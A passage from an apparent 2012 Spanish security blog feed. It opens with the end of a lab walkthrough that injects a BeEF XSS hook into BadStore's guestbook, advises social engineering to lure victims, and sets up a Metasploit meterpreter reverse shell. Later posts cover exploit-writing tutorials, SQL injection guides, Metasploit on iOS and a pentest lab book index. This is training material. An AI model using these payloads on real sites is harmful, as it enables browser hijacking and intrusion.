En nuestro navegador ingresamos a la siguiente dirección URL para acceder al panel de control.

Como observamos nos hay ninguna máquina zombi.

PASO 4:

Hasta aquí tenemos casi el 40% de nuestro ataque, pero para concretarlo necesitamos una carnada, en este caso BADSTORE será el sitio ya que posee vulnerabilidades XSS en su codificación.

Bien vamos a ir al libro de visitas para firmar y a la vez cargar nuestro script “hook,js” (la carnada)

Manos a la obra <script src=http://ip_bactrack_beef:3000/hook.js></script>

PASO 5:

Pues aquí nos tocaría esperar que nuestra víctima firme el libro de visitas para que se convierta en zombi de nuestro BeEF

No tenemos tan mala suerte y una víctima procedió a firmar el libro de visitas, aquí se recomendaría publicitarlo por algún método de ingeniería social.

PASO 6:

De vuelta a nuestro panel de control de BeEF nos damos cuenta que ya tenemos objetivos zombis, nuestra víctima con IP 192.168.0.100

En la pestaña Detalles podemos revisar las características del sistema zombi, y con ello podremos enfocarnos en las vulnerabilidades que presenta el sistema objetivo.

PASO 7:

Ahora que tenemos más claro las características de nuestra víctima nos dirigimos a la pestaña de comandos / Metasploit

Escogemos Mozilla Firefox Array.reduceRight() Integer Overflow y llenamos lo siguiente:

SRVHOST: 192.168.0.20 (ip de nuestra máquina BT)

SRVPORT: 8080

PAYLOAD: windows/meterpreter/reverse_tcp

LPORT: 4444 (si estuviera ocupado escoger otro)

EXITFUNC: process

PASO 8:

Nos dirigimos a la consola de Metasploit y nos damos cuenta que tenemos session.

Probamos con los comandos:

meterpreter>getuid

meterpreter>sysinfo

Como podemos observar que al tener session meterpreter podemos escalar privilegios y garantizar la conexión para no depender de BeEF, ya que cuando la víctima salga del sitio sabemos que perdemos la máquina zombi.

Espero les haya gustado.

*********************************************************************************************************************************

Si lo desean lo pueden Descargar en formato PDF desde acá.

Salud2
Th3h@Ck¡_@dM¡n

2 Nuevos Libros Pa'l Canasto!

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Mon, 29 Oct 2012 09:29:30 PDT


2 Más Pa'l Canasto - It Forensic LTDA

Los muchachos de informática 64 no se quedan quietos, ni en el verano, es por eso que durante estos meses nos ha traído de primera mano dos nuevas creaciones con la mejor calidad. Y al mejor estilo del profesor Víctor Frankenstein podriamos decir. -It's Alive!!.

Estas dos nuevas creaciones son:

Windows Server 2012 para IT Pro
	Autores: Pablo González Pérez, Francisco Jesús Alonso Franco, Alejandro Remondo Álvarez, Sergio San Román Moreno, Carlos Álvarez Martín y Chema Alonso Núm. Hojas: 288

Metasploit para Pentesters
	Autores: Pablo González Pérez y Chema Alonso Núm. Hojas: 288

Por lo que como nosotros acá en Colombia ~~tenemos corona~~, perdón tenemos un convenio con la gente de informática 64, estas dos nuevas maravillas, producto del conocimiento amplio de sus creadores, es tan para el acceso al publico por medio de la empresa It Forensic LTDA poderosa aliada de la ya antes mencionada Informática 64.

Lo mejor de todo es que no solo estos dos libros los tenemos para su venta y distribución en todo el territorio nacional Colombiano, sino todos los libros concebidos en la familia Informática 64.

Para encargar su libro, o para ver cuales hay, solamente se dirigen a la pagina de It forensic, hacen clic sobre el libro que les llame mas la atención, lo conocen un poco mas y lo solicitan!.

Así pues que a disfrutar y a aprender de manos de Informática 64 y su aliado en Colombia IT Forensic LTDA.

Salud2
Th3h@Ck¡_@dM¡n

Ciberguerra Y Ciberterrorismo Una Realidad En Desarrollo!!

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Mon, 08 Oct 2012 14:57:48 PDT

Leyendo un poco por Internet hemos descubierto un documental que ha publicado chema en su blog "Un informático en el lado del mal" acerca del cyberterrorismo y la cyberguerra, dos términos que con el pasar del tiempo y el avance de la tecnología se van acuñando cada ves mas ante la impotente mirada de nosotros.

Vemos como a diario los gobiernos hipocritamente se abrazan mientras ciudadanos de todos los países se pelean y derraman su sangre por todos los lugares del mundo.

Ahora, dando una paso agigantado en el avance tecnológico y en el desarrollo del espionaje informático incluyendo entre esto los ataques cibernéticos entre naciones, ya no sabremos en que lugar estamos puestos.

(Quiero dejar claro que la opinión antes mencionada no compromete a ningún tipo de persona empresa o proyecto, pues es única, y me hago responsable de lo que he escrito.)

El vídeo que a continuación verán (Si no lo han visto aun) lo han transmitido por TVE en el programa En Portada dedicado a la Ciberguera, el Ciberespionaje y el CiberTerrorismo.
Un documental muy bien y trabajado y con una excelente producción, el que nos dejara muchas cosas en que reflexionar y en que pensar.

Ver vídeo

Veanlo, reflexionen y compartan sus pensamientos!.

Salud2
Th3h@Ck¡_@dM¡n

Creando Exploits Paso A Paso, Tutoriales En Español

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Tue, 02 Oct 2012 15:08:15 PDT

Saludos Lectores, de vuelta al ruedo y de nuevo en el blog.

En esta ocasión nos hemos encontrado en las fuentes RSS con un articulo de Zion3R, creador del blog también de seguridad informática, Blackploit, donde nos lista una serie de pdf que tratan sobre como crear nuestros propios exploits.

Estos pdf que originalmente son llamados "Exploit writing" están en ingles y fueron escritos por corelanc0d3r.

Ahora, estos están en español gracias al trabajo de Ivinson, quien ha hecho un gran esfuerzo en la traducción de este material.

Los pdf's son:

Creación de Exploits 1: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 42
Tamaño: 681 KB

Creación de Exploits 2: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 36
Tamaño: 467 KB

Creación de Exploits 3: SEH por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 36
Tamaño: 643 KB

Creación de Exploits 3b: SEH por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 11
Tamaño: 114 KB

Creación de Exploits 4: De Exploit a Metasploit por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 15
Tamaño: 73 KB

Creación de Exploits 5: Acelerar el Proceso con Plugins y módulos por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 29
Tamaño: 326 KB

Exploits Evitando SEHOP por SYSDREAM IT Security Services traducido por Ivinson
Formato: PDF
Páginas: 12
Tamaño: 192 KB

Creación de Exploits 6: Cookies del Stack SafeSEH, SEHOP, HW DEP y ASLR por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 107
Tamaño: 1.168 KB

Creación de Exploits 7: Unicode - De 0×00410041 a la Calc por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 57
Tamaño: 442

Creación de Exploits 8: Cacería de Huevos en Win32 por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 79
Tamaño: 1.231 KB

Creación de Exploits 9: Introducción al Shellcoding en Win32 por corelanc0d3r traducido por Ivinson
Formato: PDF
Páginas: 113
Tamaño: 1.306 KB

Creación de Exploits 10: Uniendo DEP con ROP - El Cubo de Rubik [TM] por corelanc0d3r traducido por Ivinson.
Formato: PDF
Páginas: 111
Tamaño: 1.809 KB

Espero entonces que les saquen el mayor provecho y aprendan bastante.

Fuentes:
[+] Entrada en Blackploit
[+] Entrada en la web de Ivinson
[+] Archivos Originales

Salud2
Th3h@Ck¡_@dM¡n

LUEGO DE LA GIRA POR ECUADOR Y BOLIVIA - "The Hacking Day - Project" VUELVE CON LOS TALLERES A COLOMBIA

noreply@blogger.com (ThDjca) — Mon, 10 Sep 2012 14:08:10 PDT

Gracias a nuestro representante en Ecuador Roberto Olaya de la empresa Hack Security y a nuestro representante en Bolivia Alvaro Andrade de la empresa Ethical Hackers Consultores logramos en una corta gira hacer nuevos amigos y afianzar mas la proyección “The Hacking Day – Project”

Como siempre los talleres de la serie “The Hacking Day – Weekend “, quedan cortos a la hora de atender las nuevas demandas de llevar mas y nuevos talleres, por tanto ya se esta gestionado en Ecuador la presencia del proyecto apoyando el evento de la Cámara de Comercio de Guayaquil y por otro lado en Bolivia se están haciendo los convenios para hacer gira por la Paz, Cochabamba y Santa Cruz entre el mes de Octubre y Septiembre. Los mantendremos informados.....

Con relación a Colombia ya están listas las fechas para continuar con las serie de Talleres en Medellín y Bogota . Esta vez los talleres elegidos son:

“Taller de Seguridad Web”: dictado por primera vez en Colombia, es un curso altamente practico donde se descubre cuales son las vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar este tipo de fallas.

“Taller de Seguridad Inalambrica”: Este taller altamente practico descubriremos cuales son las vulnerabilidades en los distintos protocolos inalámbricos, como explotar dichas vulnerabilidades y como configurar nuestros dispositivos, para tratar de evitar que estos equipos sean vulnerables a este tipo de ataques. Como novedad en este taller se mejoraron las técnicas de ataque donde incluye WPS y se demuestra el funcionamiento de herramientas para el ataque de redes inalámbricas mediante la utilización de dispositivos móviles con Android o OpenWrt como la piña Wi-Fi.

Recuerde reservar pronto los cupos a través de nuestro sitio oficial en la zona de inscripciones.

Saludos
ThDjca

Guía Actualizada de MetaSploit para IPAD/IPHONE

noreply@blogger.com (ThDjca) — Wed, 29 Aug 2012 08:27:05 PDT

En el blog de Metasploit, Andrew Spangler and James Kirk han publicado una guía actualizada para instalar Metasploit en dispositivos iOS. hemos decido publicar esta referencia en español que ha publicado otro de nuestros parnerts.

Advertencia: Para instalar Metasploit, necesitarás acceso de root a tu dispositivo - que deber ser realizado siguiendo tu procedimiento de jailbreak favorito. Por ejemplo Absinthe. Hacer jailbreak a tu dispositivo puede en potencia causarte problemas a ti o a tu dispositivo, y perderás la garantía. Tú asumes todo el riesgo cuando modificas tu dispositivo. Sin embargo, si quieres instalar Metasploit es porque probablemente disfrutes rompiendo cosas. :-)

Una vez que seas root, necesitar el siguiente software:

OpenSSH server (vía Cydia)
apt [APT 0.7+ Strict] (vía Cydia)
SSH client (iSSH; vía App Store)

Primero, asegúrate de que todo el software está actualizado y que tienes instalado subversion:

apt-get update
apt-get dist-upgrade
apt-get install wget subversion

Cuando esté listo, necesitaremos descargar Ruby y las dependencias de iOS para que corra Metasploit Framework. Cuando se escribió este artículo, los ficheros necesarios estaban amablemente alojados en iNinjas:

Instala los paquetes:

dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

Una vez que las dependencias han terminado de instalarse, puedes eliminar los ficheros con seguridad para ahorrar espacio de almacenamiento en tu dispositivo. Presumiblemente esos serán los únicos ficheros .deb que hayas descargados, así que puedes ejecutar un comando rm -rf *.deb. Si has estado jugueteando con otros ficheros, entonces sustituye el * por el nombre de los ficheros que quieras eliminar.

Si quieres hacer una doble comprobación de que todo está totalmente instalado correctamente, deberías ser capaz de ver la versión de Ruby 1.9.2 ejecuanto el comando ruby -v.

¡Ahora viene lo bueno! se recomienda instalar Metasploit Framework en /private/var/msf3. En caso de no estés familiarizado, /private/var es la partición en la que tus apps, contenido multimedia y configuraciones son almacenadas por defecto, así que es con seguridad la partición más grande de las dos que trae por defecto tu dispositivo.

Vamos a usar svn para conseguir el trunk de Metasploit Framework para que sea un proceso simple y evitar problemas de compatibilidad.

cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3

Y ya está listo, cd msf/ y ¡lanza Metasploit Framework!

ruby msfconsole

Buenos chicos "Feliz Exploting" y cuidado con los daños

Fuente en Español: Segurity Apple

Saludos
ThDjca

Video Tutoriales Para Desarrollar en Android

noreply@blogger.com (ThDjca) — Wed, 15 Aug 2012 17:05:47 PDT

Navegando por la Web y con el fin de seguir alguna sugerencia de un desarrollor que sigue nuestro blog, dejo a continuación los enlaces de 118 Videos Tutoriales para desarrollar en Android.

Con este curso aprenderás a manejar el entorno de desarrollo Eclipse para diseñar aplicaciones Android, usando adecuadamente las APIs de Google, comprendiendo el funcionamiento y utilizando todos los sensores del terminal, usándolos como fuente de datos para tus aplicaciones. Una vez finalizado el curso, serás capaz de desarrollar aplicaciones para móviles y adquirirás los conocimientos necesarios para profundizar en el desarrollo de aplicaciones más avanzadas. También tendrás la posibilidad de comercializar tus aplicaciones en el Market, el almacén de aplicaciones para dispositivos móviles Android.

ENLACES DE DESCARGA

http://freakshare.com/files/7ol9va4r/Curso-Android-freakshare.part1.rar.html

http://freakshare.com/files/tvggx0mx/Curso-Android-freakshare.part2.rar.html

http://freakshare.com/files/dga6p7tu/Curso-Android-freakshare.part3.rar.html

Fuente: http://underc0de.org/foro/
Saludos
ThDjca

"The Hacking Day - Project" Ahora en BOLIVIA

noreply@blogger.com (ThDjca) — Wed, 15 Aug 2012 17:07:18 PDT

El proyecto de Hacking Day, hará parte de los talleres prácticos que apoyaran el evento de seguridad informatica EHCON Bolivia 2012.

Gracias a nuestro estimado amigo Álvaro Andrade, quien conocíamos desde Ecuador y luego tuvimos la oportunidad de tenerlo en la ciudad de Manizales en Colombia en el ACK Security Conference 2012.

La fechas oficiales serán del 27 al 31 de Agosto, se celebrará el encuentro en la Boliviana ciudad de Santa Cruz de la Sierra. El evento constara de dos fases: tres días dedicados a charlas y dos dedicados a talleres o trainings.

Dentro de la plana de ponentes se tiene un cartel muy destacado como Leonardo Pigñer, Matías Katz, Jaime (DragonJar), Jhon César, del proyecto "The HAcking Day", Álvaro Andrade, Lorenzo Martinez de “Security by Default” entre otros expertos en seguridad.

Además, Chema Alonso ha enviado 30 libros seleccionados de la editorial técnica Informática64, que puedes adquirir en el recinto. Asimismo, durante el evento se sortearán otros 5 libros de dicha editorial con una sorpresa incluida en el interior.

Dentro de los talleres que se llevaran del proyecto ThD, se cuenta con Pentesting con BackTrack (Actualizado a la versión 5 R3), MetaSploit en Profundidad, Análisis Forense IOS y Taller de Seguridad Wi-Fi

En la página oficial del event EHConference 2012, se puede ver los datos relativos a la agenda de charlas y podrás inscribirte a los talleres.

Para mantener informados de las últimas novedades del evento siguiendo la cuenta Twitter @ehconference o el hashtag #ehcon.

Nos vemos pronto amigos de Bolivia......

Saludos
ThDjca

Guia para SQL Injection (MySQL, MSSQL y ORACLE)

noreply@blogger.com (ThDjca) — Wed, 15 Aug 2012 17:08:25 PDT

Navegando por los diferentes foros encontré una guía muy completa para inyecciones SQL que cubre MySQL, MSSQL y ORACLE, desde la detección de inyecciones SQL hasta explotación avanzada evadiendo WAF/IDS.

El autor Roberto Salgado (@LightOS) agrega nuevos ataques y métodos de evasión diariamente.

Es una guía muy extensa, clara y está organizada muy ordenadamente por temas:

MySQL

MSSQL

ORACLE

Extras

Visto en: http://www.hakim.ws/

Saludos

ThDjca

Libro: Offensive Security Lab Exercises

noreply@blogger.com (ThDjca) — Tue, 17 Jul 2012 06:05:48 PDT

Me he encontrado con un libro bastante bueno, Offensive Security Lab Exercises, el cual es una suerte de bitácora donde enseñan con ejercicios como usar las herramientas que trae Backtrack. Es bastante claro e ilustrativo, aquí dejo el index para que vean los temas que trata:

1. Module 1 - BackTrack Basics
1.1 Finding your way around the tools
1.1.1 Exercise 1
1.2 Basic Services
1.2.1 DHCP
1.2.2 Static IP assignment
1.2.3 Apache
1.2.4 SSHD
1.2.5 Tftpd
1.2.6 VNC Server
1.2.7 Exercise 2
1.3 Basic Bash Environment Overview
1.3.1 Simple Bash Scripting
1.3.2 Exercise 3
1.3.3 Possible Solution for ICQ Exercise
1.3.4 Exercise 4
1.4 Netcat The Almighty Overview
1.4.1 Connecting to a TCP/UDP port with Netcat
1.4.2 Listening on a TCP/UDP port with Netcat
1.4.3 Transferring files with Netcat
1.4.4 Remote Administration with Netcat
1.4.4.1 Scenario 1 – Bind Shell
1.4.4.2 Scenario 2 – Reverse Shell
1.4.5 Exercise 5
1.5 Using WireShark (Ethereal) Overview
1.5.1 Peeking at a Sniffer
1.5.2 Capture filters
1.5.3 Following TCP Streams
1.5.4 Exercise 6
2. Module 2- Information Gathering Techniques A note from the authors
2.1 Open Web Information Gathering Overview
2.1.1 Google Hacking
2.1.1.1 Advanced Google Operators
2.1.1.2 Searching within a Domain
2.1.1.3 Nasty Example #1
2.1.1.4 Nasty Example #2
2.1.1.5 Email Harvesting
2.1.1.6 Finding Vulnerable Servers using Google
2.1.1.7 Google API
2.2. Miscellaneous Web Resources
2.2.1 Other search engines
2.2.2 Netcraft
2.2.3 Whois Reconnaissance
2.3 Exercise 7
3. Module 3- Open Services Information Gathering A note from the authors
3.1 DNS Reconnaissance
3.1.1 Interacting with a DNS server
3.1.1.1 MX Queries
3.1.1.2 NS Queries
3.1.2 Automating lookups
3.1.3 Forward lookup bruteforce
3.1.4 Reverse lookup bruteforce
3.1.5 DNS Zone Transfers
3.1.6 Exercise 8
3.2 SNMP reconnaissance
3.2.1 Enumerating Windows Users
3.2.2 Enumerating Running Services
3.2.3 Enumerating open TCP ports
3.2.4 Enumerating installed software
3.2.5 Exercise 9
3.3 SMTP reconnaissance
3.3.1 Exercise 10
3.4 Microsoft Netbios Information Gathering
3.4.1 Null sessions
3.4.2 Scanning for the Netbios Service
3.4.3 Enumerating Usernames
3.4.4 Exercise 11
4. Module 4- Port Scanning A note from the authors
4.1 TCP Port Scanning Basics
4.2 UDP Port Scanning Basics
4.3 Port Scanning Pitfalls
4.4 Nmap
4.5 Scanning across the network
4.5.1 Exercise 11
4.6 Unicornscan
5. Module 5- ARP Spoofing A note from the authors
5.1 The Theory
5.2 Doing it the hard way
5.2.1 Victim Packet
5.2.2 Gateway Packet
5.3 Ettercap
5.3.1 DNS Spoofing.
5.3.2 Fiddling with traffic
5.3.3 Exercise 12

6. Module 6- Buffer overflow Exploitation (Win32) A note from the authors Overview
6.1 Looking for the Bugs
6.2 Fuzzing
6.3 Replicating the Crash
6.4 Controlling EIP
6.4.1 Binary Tree analysis
6.4.2 Sending a unique string
6.5 Locating Space for our Shellcode
6.6 Redirecting the execution flow
6.7 Finding a return address
6.7.1 Using OllyDbg
6.8 Getting our shell
6.9 Improving exploit stability
6.9.1 Exercise 13
7. Module 7- Working With Exploits
7.1 Looking for an exploit on BackTrack
7.1.1 RPC DCOM Example
7.1.2 Wingate Example
7.1.3 Exercise 14
7.2 Looking for exploits on the web
7.2.1 Security Focus
7.2.2 Milw0rm.com
8. Module 8- Transferring Files Exercise
8.1 The non interactive shell
8.2 Uploading Files
8.2.1 Using TFTP
8.2.1.1 TFTP Pros
8.2.1.2 TFTP Cons
8.2.2 Using FTP
8.2.3 Inline Transfer - Using echo and DEBUG.exe
8.3 Exercise 15
9. Module 9 – Exploit frameworks
9.1 Metasploit
9.1.1 Metasploit Command Line Interface (MSFCLI)
9.1.2 Metasploit Console (MSFCONSOLE)
9.1.3 Metasploit Web Interface (MSFWEB)
9.1.4 Exercise 16
9.1.5 Interesting Payloads
9.1.5.1 Meterpreter Payload
9.1.5.2 PassiveX Payload
9.1.5.3 Binary Payloads
9.1.6 Exercise 17
9.1.7 Framework v3.0
9.1.7.1 Framework 3 Auxiliary Modules
9.1.8 Framework v3.0 Kung Foo
9.1.8.1 db_autopwn
9.1.8.2 Kernel Payloads
9.1.9 Exercise 18
9.2 Core Impact
9.2.1 Exercise 19
10. Module 10- Client Side Attacks A note from the authors
10.1 Client side attacks
10.2 MS04-028
10.3 MS06-001
10.4 Client side exploits in action
10.5 Exercise 20
11. Module 11- Port Fun A note from the authors
11.1 Port Redirection
11.2 SSL Encapsulation - Stunnel
11.2.1 Exercise 21
11.3 HTTP CONNECT Tunneling
11.4 ProxyTunnel
11.4.1 Exercise 22
11.5 SSH Tunneling
11.6 What about content inspection ?
12. Module 12- Password Attacks A note from the authors
12.1 Online Password Attacks
12.2 Hydra
12.2.1 FTP Bruteforce
12.2.2 POP3 Bruteforce
12.2.3 SNMP Bruteforce
12.2.4 Microsoft VPN Bruteforce
12.2.5 Hydra GTK
12.3 Password profiling
12.3.1 WYD
12.4 Offline Password Attacks
12.4.1 Windows SAM
12.4.2 Windows Hash Dumping – PWDump / FGDump
12.4.3 John The Ripper
12.4.4 Rainbow Tables
12.4.5 Exercise 24
12.5 Physical Access Attacks
12.5.1. Resetting Microsoft Windows
12.5.2 Resetting a password on a Domain Controller
12.5.3 Resetting Linux Systems
12.5.4 Resetting a Cisco Device
13. Module 13 - Web Application Attack vectors
13.1 SQL Injection
13.1.1 Identifying SQL Injection Vulnerabilities
13.1.2 Enumerating Table Names
13.1.3 Enumerating the column types
13.1.4 Fiddling with the Database
13.1.5 Microsoft SQL Stored Procedures
13.1.6 Code execution
13.2 Web Proxies
13.3 Command injection Attacks
13.3.1 Exercise 25
14. Module 14 - Trojan Horses
14.1 Binary Trojan Horses
14.2 Open source Trojan horses
14.2.1 Spybot
14.2.2 Insider
14.3 World domination Trojan horses
14.3.1 Rxbot
15. Module 15 - Windows Oddities.
15.1 Alternate NTFS data Streams
15.1.1 Exercise 26
15.2 Registry Backdoors
15.2.1 Exercise 27
16. Module 16 - Rootkits
16.1 Aphex Rootkit
16.2 HXDEF Rootkit
16.3 Exercise R.I.P
Final Challenges.
Tasks

Descarga Offensive Security Lab Exercises:
Descarga Directa:
http://doc.hackbbs.org/Hacking/offensive-security-labs-os-2402.pdf

Fuente del articulo: blackploit

Saludos
ThDjca